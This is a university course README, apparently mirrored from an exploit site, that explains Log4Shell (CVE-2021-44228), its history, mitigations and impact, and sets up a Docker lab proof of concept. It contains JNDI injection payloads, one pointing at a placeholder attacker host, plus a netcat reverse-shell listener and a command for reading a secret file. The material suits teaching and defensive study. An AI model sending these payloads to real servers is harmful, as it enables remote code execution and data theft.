## https://sploitus.com/exploit?id=40E52223-C309-5E07-BDDC-2B93D5BCEEEB
# Log4Shell β Technical Overview & PoC
Made in May 2026 by Robin KΓΆhler and Darian Rashed as part of the lecture *Secure Software Testing* at Hochschule Bonn-Rhein-Sieg.
## What is Log4Shell (CVE-2021-44228)?
### Vulnerability Profile
| Attribute | Details |
| ---------------------- | ---------------------------------------------------------------------------------------------- |
| **Name** | Log4Shell |
| **CVE-Record** | CVE-2021-44228 |
| **Vulnerability Type** | Remote Code Execution (RCE), Server-Side Request-Forgery (SSRF), Insecure Deserialization |
| **Risk Level** | Critical; it was assigned the highest possible CVSS score of 10.0 |
| **Affected Software** | The Java logging library Apache Log4j 2 (and potentially any software using it) |
| **Affected Versions** | Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) |
| **Root Cause** | A feature called Lookups insecurely processed JNDI commands directly within log messages |
| **Key Protocols** | Primarily LDAP, but also RMI and DNS can be used as interfaces for the exploit |
### Introduction
On December 9th 2021 a 0-day exploit in the Java logging library Apache Log4j was made public on Twitter alongside a PoC on Github. The vulnerability was originally discovered by Chen Zhaojun of the Alibaba Cloud Security Team and privately disclosed to the Apache Development team. Yet it was independently published before Apache could react accordingly. The now public exploit quickly gained attention as it required minimal effort to exploit, was easy to automate, lead to total server compromise and resided in a library widely used in software services. A lot of organizations did not even know they were running it. While the vulnerability was widely discussed as *Log4Shell* it later received the official identifier CVE-2021-44228 and the maximum severity of *Critical* (CVSS 10.0). The BSI assessed it as severity *ROT: IT-Bedrohungslage ist extrem kritisch.*
Log4Shell was less of a bug and more of an architectural failure that was in the code base since 2013. It made use of Log4J's JNDI-lookup mechanism intended to allow developers to populate log entries with dynamic values. However, Log4J implemented this lookup as a variable substitution that also worked after the log message had already been constructed. So Log4j failed to distinguish between a trusted developer-defined pattern and malicious user-supplied data allowing for arbitrary exploits.
### Exploitation Steps
1. **Attacker Set-up:** The Attacker sets up a HTTP-server with the java `.class`-file that they want to execute on the victims server. They then set up a LDAP-server, which refers incoming requests to the java `.class`-file on the HTTP-server.
2. **Injection of Malicious Data:** The attacker sends a payload string (like ` ${jndi:ldap://attacker.com/Exploit}`) through any logged interface, such as HTTP-headers, form fields, or chat logs.
3. **Processing and Lookup:** The library identifies the lookup pattern ` ${jndi:` and hands it to the `StrSubstitutor`-class. The vulnerable machine triggers a JNDI-query, using the LDAP-protocol to connect to the attacker's server.
4. **Remote Object Loading:** The attackerβs LDAP-server responds and sends a Java classpath pointing to a malicious `.class`-file.
5. **Execution:** The vulnerable server downloads the injected class and executes the code within its own process, resulting in RCE.
### Mitigation
The most complete mitigation for Log4Shell is updating Log4J to version 2.17.0 or newer. Where updates are not possible, removing the `JndiLookup` class is an option too.
Under pressure by the vulnerability going public, Apache issued the patch 2.15.0 on December 10th 2021 in an attempted to disable lookups by default, accidentally enabling a new RCE-mechanism with the identifier CVE-2021-45046. Patch 2.16.0 removed the JNDI-feature entirely to stop RCE but remained vulnerable to a recursive lookup DoS (CVE-2021-45105), necessitating patch 2.17.0 that mitigated the issue entirely.
While waiting on patches, people also recommended actions to triage the issue like removing the `JndiLookup`-class in Log4J entirely or disabling lookups via setting the environment variable `log4j2.formatMsgNoLookups=true`. The later strategy turned out being ineffective at stopping certain attacks. Methods for checking your own infrastructure for being vulnerable were also spread freely.
### Real-World Impact
Within hours of the initial GitHub PoC and Twitter disclosure, mass scanning for vulnerable servers began as major global services and thousands of applications and frameworks were vulnerable. The attacks weaponized Log4Shell for spreading malware and for exfiltration of data and credentials. Security researches identified several state-sponsored APT groups actively exploiting the flaw for strategic objectives.
The severity of the vulnerability lead to extensive media coverage and government response. The German Federal Office for Information Security (BSI) raised its cybersecurity warning to level "Red" (extremely critical), noting that many services could fail or regular operations could not be maintained. In the United States, CISA added Log4Shell to its Known Exploited Vulnerabilities Catalog, mandating federal agencies to patch or remove affected software within two weeks. As a preventive measure, some networks and services (like the network of the German state Thuringia) were taken offline completely.
## Our Proof-of-Concept
### Architecture and Attack Flow
```
βββββββββββββββββββββββββββββ
β log4shell PoC β
β Docker Network Bridge β
β log4shell-network β
βββββββββββββββ¬ββββββββββββββ
β
βββββββββββββββββββββββββββββββΌββββββββββββββββββββββββββββββ
β β β
β β β
ββββββββββββΌβββββββββββ ββββββββββββΌβββββββββββ ββββββββββββΌβββββββββββ
β vulnerable-app β β ldap-server β β http-server β
β Port: 8080 β β Port: 1389 β β Port: 8000 β
β---------------------β β---------------------β β---------------------β
β Springboot App w/ β β marshalsec β β Simple Python β
β vulnerable Log4j β β LDAPRefServer β β http-server β
β---------------------β β---------------------β β---------------------β
β Accepts and logs β β Returns class β β Serves malicious β
β user input, does β β reference, points β β EvilMalware.class β
β JNDI-lookups β β to http-server β β class payload β
ββββββββββββ¬βββββββββββ ββββββββββββ¬βββββββββββ ββββββββββββ¬βββββββββββ
β β β
β 1. Performs JNDI-lookup β β
β ${jndi:ldap://...} β β
β β β
ββββββββββββββββββββββββββββββΊβ β
β β β
β 2. LDAP-response returns β β
β remote class reference β β
β β β
βββββββββββββββββββββββββββββββ β
β β
β 3. Downloads and loads EvilMalware.class β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββΊβ
β
β 4. Code execution static{} block runs
β
β ββββββββββββββββββββββββ
β 5. Reverse shell connects β attacker-listener β
β β Port: 4444 β
ββββββββββββββββββββββββββββββΊβ----------------------β
β β Netcat listener β
β 6. Interactive Shell β nc -lvnp 4444 β
β β----------------------β
ββββββββββββββββββββββββββββββΊβ Listens for reverse β
β β shell connections β
β β from vulnerable-app β
β ββββββββββββββββββββββββ
βΌ
βββββββββββββββββββββββββ
β Attacker gained β
β access to victim's β
β infrastructure β
βββββββββββββββββββββββββ
```
### Setup
Assuming you use an SSH key for authentication and you have [Docker installed correctly](https://docs.docker.com/engine/install/), clone the repository by running:
```
git clone git@git.fslab.de:drashe2s/log4shell.git
```
Open the folder and initialize the submodules by running:
```
cd log4shell && git submodule update --init --recursive
```
Lastly, run the following command to build the containers:
```
docker compose build
```
### Usage
After completing the setup steps, run the following command to start the containers and see their respective log messages in the terminal:
```
docker compose up
```
Point your browser to the following [URL](http://localhost:8080).
```
http://localhost:8080
```
This is the web interface of our vulnerable application running Log4J 2.14.1. It's a shopping list service. Try adding a few items to the list and have a look at the logs in your console.
Now try exploiting the application by entering a malicious item using the syntax below:
```
${jndi:ldap://ldap-server:1389/EvilMalware}
```
Have another look at the logs. Clearly something else is going on now. Looks like our attacker-listener has a new connection π
Back in the terminal, press `d` to detach from the containers' output or simply open a new terminal window in the same folder.
To access the shell of our `attacker-listener`, use:
```
docker compose attach attacker-listener
```
We now have access to the `vulnerable-app` container over the network and can read the server's secrets:
```
ls && cat secret.txt
```
When you're done, press `Ctrl+p Ctrl+q` to detach from the `attacker-listener`, then stop all the containers by running:
```
docker compose down
```
## Further Reading and Related Projects
### Resources
- [Apache Software Foundation: "Log4j 2.17.0 Release Notes"](https://logging.apache.org/log4j/2.x/release-notes.html#release-notes-2-17-0)
- [Apache Software Foundation: "Log4j Lookups Documentation"](https://logging.apache.org/log4j/2.x/manual/lookups.html)
- [Bechler, M.: "PSA: Log4Shell JNDI Injection"](https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
- [Spring: "Building an Application with Spring Boot"](https://spring.io/guides/gs/spring-boot)
- [Docker Library: "Java OpenJDK 8 JDK Alpine Image Info"](https://github.com/docker-library/repo-info/blob/master/repos/java/remote/openjdk-8-jdk-alpine.md)
- [Google Security Blog: "Understanding the Impact of Apache Log4j Vulnerability"](https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html)
- [AWS Open Source Blog: "Hotpatch for Apache Log4j"](https://aws.amazon.com/blogs/opensource/hotpatch-for-apache-log4j/)
- [Amazon Corretto: "Hotpatch for Apache Log4j2"](https://github.com/corretto/hotpatch-for-apache-log4j2)
- [Heise: "Log4j-LΓΌcke: Erste Angriffe mit Ransomware und von staatlichen Akteuren"](https://www.heise.de/news/Log4j-Luecke-Erste-Angriffe-mit-Ransomware-und-von-staatlicher-Akteuren-6296549.html)
- [Vehere: "Log4Shell Vulnerability: Critical Analysis and Effective Detection Strategies"](https://vehere.com/log4shell-vulnerability-critical-analysis/)
- [Cloudflare: "Inside the Log4j2 Vulnerability (CVE-2021-44228)"](https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/)
- [INNOQ: "Querying DNS and LDAP Using JNDI"](https://www.innoq.com/en/articles/2022/04/java-jndi/)
### Related Projects
- [Marshalsec: The LDAP server we used](https://github.com/mbechler/marshalsec/tree/master)
- [rhuss: "Log4Shell Proof of Concept"](https://github.com/rhuss/log4shell-poc)